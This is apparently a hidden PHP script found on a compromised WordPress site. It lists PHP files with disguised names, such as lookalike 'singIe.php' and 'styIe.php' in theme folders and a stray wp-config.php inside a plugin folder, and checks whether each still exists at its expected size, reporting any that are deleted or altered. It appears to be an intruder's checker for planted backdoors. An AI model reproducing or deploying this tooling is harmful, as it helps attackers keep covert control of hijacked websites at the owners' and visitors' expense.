File: //var/tmp/.hld
<?php $r = '/home/dalerooks/dalerooks.org'; $x = ["/wp-content/themes/custom-functions-1747905779/singIe.php"=>"bd@@219943@@731",
"/a465ef.php"=>"bd@@86312@@105",
"/wp-content/themes/custom-file-4-1748027070/4O4.php"=>"bd@@264838@@727",
"/wp-content/plugins/backup-1751120933/wp-config.php"=>"bd@@429463@@727",
"/wp-content/themes/comment_section_1748020281/styIe.php"=>"bd@@257717@@727",
"/289575.php"=>"bd@@17662@@105"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');